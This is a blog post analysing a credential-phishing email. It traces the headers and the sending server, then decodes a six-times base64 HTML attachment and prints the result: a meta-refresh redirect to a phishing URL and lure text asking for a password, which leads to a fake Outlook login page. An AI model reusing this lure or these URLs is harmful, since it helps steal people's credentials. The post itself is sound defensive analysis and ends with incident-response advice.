Analysis of a phishing email

As the whole world has become more used to working from home due to COVID-19, it is only natural to have cyber attackers focus more on attacking users through online phishing campaigns. Recently I got a (not-so-sophisticated) phishing email to my work email address and in this blogpost I will present a quick way to analyse a phishing email without going too deep down the rabbit hole.

This was the phishing email that arrived in my mailbox:

As we can see it claims to come from “<company name> Workplace Scanner” which should already trigger some red flags. As I later learned, a lot of our partners got the same email with the exception of company name changed according to the target. Most likely this means the attack is part of mass phishing campaign using a predefined template rather than a very specifically targeted and carefully crafted email.

The email claims to come from the address “no-reply@s2.valueserver.jp” but this is not to be trusted as it is possible to spoof the sending address. To determine the true source of email, we need to examine the raw email header. In Gmail this can be found easily through the 3-dot icon while having the email opened:

Having opened the original email, you will see a lot of information in the header and the route taken by the email. We are interested in the “Received:” entries in the header which will give us the information we need to determine where the email originated from. Think of “Received:” entries like stops (email servers) that the email takes on the way from travelling from the source origin to the destination. As an email travels from the source to its destination, each server adds its header entries to the top of the email body. So if we want to trace the email origin, this will be the very first “Received:” entry encountered from the bottom of the raw email. In our case the first entry looks like this:

Received: from s2.valueserver.jp (s2.valueserver.jp. [157.7.184.17])
        by mx.google.com with ESMTPS id a201si4298848pfa.273.2020.07.13.06.51.25
        for <name@company.com>
        (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
        Mon, 13 Jul 2020 06:51:26 -0700 (PDT)

This entry is created by the first email server as the email passes through to the destination. If the email client (or some script running on the server) is web-based then this entry will include details about the server hosting the email sending application or script. In this case we can conclude that possibly a script or a web-based client is being used.

Let’s break down the “Received:” entry. The “from” part of the entry tells us the source of the email as this was the first entry: s2.valueserver.jp (s2.valueserver.jp. [157.7.184.17]). From this we can extract the domain name (s2.valueserver.jp) and the server IP address (157.7.184.17).

The “by” part of the entry will tell us the first stop taken after the email origin: mx.google.com. This is google mail server that handled the email at its first “hop”. This can also be sometimes attacker controlled, in which case this information is not to be trusted.

Alternatively if you are too lazy to inspect the headers manually, we can copy the header to this Google tool which will help us examine the “hops” taken by the email:

Using the collected information so far, we can do further analysis. We can confirm the location of the server using ONYPHE by querying the server IP:

https://www.onyphe.io/search/?query=157.7.184.17

Result:

ONYPHE query result

The domain is hosted on a server in Japan. It is always worth to do dig query to get all the DNS records on the domain:

% dig -t any s2.valueserver.jp @8.8.8.8
; <<>> DiG 9.10.6 <<>> -t any s2.valueserver.jp @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47094
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;s2.valueserver.jp.  IN ANY
;; ANSWER SECTION:
s2.valueserver.jp. 299 IN A 157.7.184.17
s2.valueserver.jp. 3599 IN MX 10 s2.valueserver.jp.
s2.valueserver.jp. 1199 IN TXT "v=spf1 a:s2.valueserver.jp a:spf1_mxr.valueserver.jp a:spf2_mxr.valueserver.jp a:spf3_mxr.valueserver.jp ~all"

@8.8.8.8 : IP address of the name server to query. Using the Google public DNS here.

-t any : get all the records

From dig results we can see the MX record which indicates that the host has an email server running on it. We can confirm that by probing port 25 on the host using netcat command line utility:

% nc 157.7.184.17 25
220 s2.valueserver.jp ESMTP
HELO relay.valueserver.jp
250 s2.valueserver.jp

Always worth to check if the server IP is in some blacklist. A blacklist is a list of IP addresses or domains that are known sources of spam. We can use Mx Toolbox for this:

This IP is listed in 4 blacklists. So this host has been known to produce spam emails.

Using whois query we can find more information about the domain:

% whois valueserver.jp
...
Domain Information: [ドメイン情報]
[Domain Name]                   VALUESERVER.JP
[登録者名]                      株式会社デジロック
[Registrant]                    DigiRock,Inc.
[Name Server]                   ns1.value-domain.com
[Name Server]                   ns2.value-domain.com
[Name Server]                   ns3.value-domain.com
[Name Server]                   ns4.value-domain.com
[Name Server]                   ns5.value-domain.com
[Name Server]                   ns11.value-domain.com
[Name Server]                   ns12.value-domain.com
[Name Server]                   ns13.value-domain.com
[Signing Key]
[登録年月日]                    2009/04/08
[有効期限]                      2021/04/30
[状態]                          Active
[最終更新]                      2020/06/12 00:41:40 (JST)
Contact Information: [公開連絡窓口]
[名前]                          Whois情報公開代行サービス by バリュードメイン
[Name]                          Whois Privacy Protection Service by VALUE-DOMAIN
[Email]                         whoisproxy@value-domain.com
[Web Page]                      https://www.value-domain.com/
[郵便番号]                      530-0011
[住所]                          大阪府大阪市北区大深町3-1
                                グランフロント大阪 タワーB 23階
[Postal Address]
[電話番号]                      06-7634-2727
[FAX番号]                       06-6374-0121

We can conclude from this information that the domain is registered in Japanese “value-domain.com” domain registrar.

Browsing to the website “valueserver.jp” we see that it is a web hosting provider in Japan:

The Attachment

Based on the information we have gathered we can safely assume that this email is definitely not originating from our organisation and is actually coming from some obscure hosting service in Japan and has a bad reputation of sending spam. Now let’s check the actual content of the email. It claims to come from some sort of workplace scanner and contains text: “***Preview Print File***”. Also it has an attachment with .htm extension. These are usually files containing HTML code.

As a first thing I always upload the potentially malicious attachment to Virustotal. Virustotal is an online service that analyses suspicious files and URLs to detect types of malware, automatically sharing them with the security community. For example if the attachment has been widely used in a big phishing campaigns before, there is a good chance that somebody has already uploaded it to Virustotal and has marked it as a known phish. Uploading the file to Virustotal and running the scan we get only 1 AV scanner recognising it as a phish:

This is definitely not a definitive result that we were looking for so we proceed with manual analysis.

For analysing potentially malicious attachments, I recommend strongly to do that in a sandbox environment like a virtual machine. This will give you a safe environment to test malicious files. The most popular options would be Virtualbox (free) or VMware (paid). For this analysis I use Kali Linux image in Virtualbox. Having downloaded and moved the file to my linux VM, I first take a look at the contents of the file:

Contents of the file is a javascript code. Let’s break this down:

<script></script> : This tells browser program to start interpreting all the text between these tags as a javascript by default (since HTML5).

document.write() : The write() method writes HTML expressions or JavaScript code to a document.

atob() : The atob() method decodes a base-64 encoded string.

Looking at this javascript we can see there is a base64 encoded payload which is decoded six times using the atob() function and then the resulting content written to the HTML document. For decoding the base64 we can use python:

import sys
import base64
filename = sys.argv[1]
with open(filename,'rb') as f:
   content = f.read()
   for i in range(6):
       content = base64.decodebytes(content)
print(content.decode('utf-8'))

Result:

# ./decodeb64-6x.py encoded.txt 
<meta http-equiv="refresh" content="1;url=http://erikteichmann.com/vm/?0@=?aHJAY29tcGFueS5jb20="><br><b><strong>
To view  document instantly,via your media file reader please login with your correct Password for verification as Microsoft has secured file with your email password.

The content is a valid HTML code. If this is processed in the browser, it will fire a GET request to URL “http://erikteichmann.com/vm/?0@=?aHJAY29tcGFueS5jb20=”.

For checking suspicious links quickly I have recently used urlscan.io which will fetch the URL behalf of us and does the analysis of it. Submitting the URL to urlscan we get:

urlscan.io output

urlscan.io output

As we can see from the results, submitted URL will be redirected to an URL “https://notanegramusic.com/Secure/” and urlscan rates this potentially malicious. Also urlscan will do a screenshot of the landing page and we can see it is a fake outlook login page. We get also other useful information like when was the domain registered and if it is in Google Safe Browsing blacklist.

Interesting is that if we browse to “https://notanegramusic.com/” we find some sort of music production site?

It might be a dummy page setup by the attacker to show legitimacy of the domain while harvesting user credentials at the same time. Second option is that the site is real but has been compromised and is used now to harvest user credentials by the attackers.

Summary

Finally, having done this analysis, we can conclude that the phishing email purpose is to harvest outlook user account credentials. The phishing campaign is most likely originating from Japan and the server sending the emails is known to send spam emails.

Although knowing where the phish came from and knowing its purpose is useful, I would say that even more important is how security personnel reacts to every phishing email. Here are some suggestions:

• When you get a phishing email or you know anyone else in the company got it, check who else in the company got it and let them all know it was a phish. Also it is strongly recommended to warn all of the company employees of the phish if it turns out to be a mass phishing attack against the company.
• If anyone put in their account credentials on the phishing page, they need to change their account password immediately, and change it anywhere else where they used the same password.
• Monitor login attempts to those compromised accounts more carefully for a while, to see if there is any suspicious activity.
• Encourage everyone in the company to report phishing. This is key in detecting and reacting to a phishing attack quickly. This article talks about ways of improving the response rate to phishing emails.

On a side note, I think a lot of this analysis is possible to automate. This might be something I will put to my TODO list soon. If anyone knows a good tool that does a good analysis given a raw email as input, please let me know in the comments!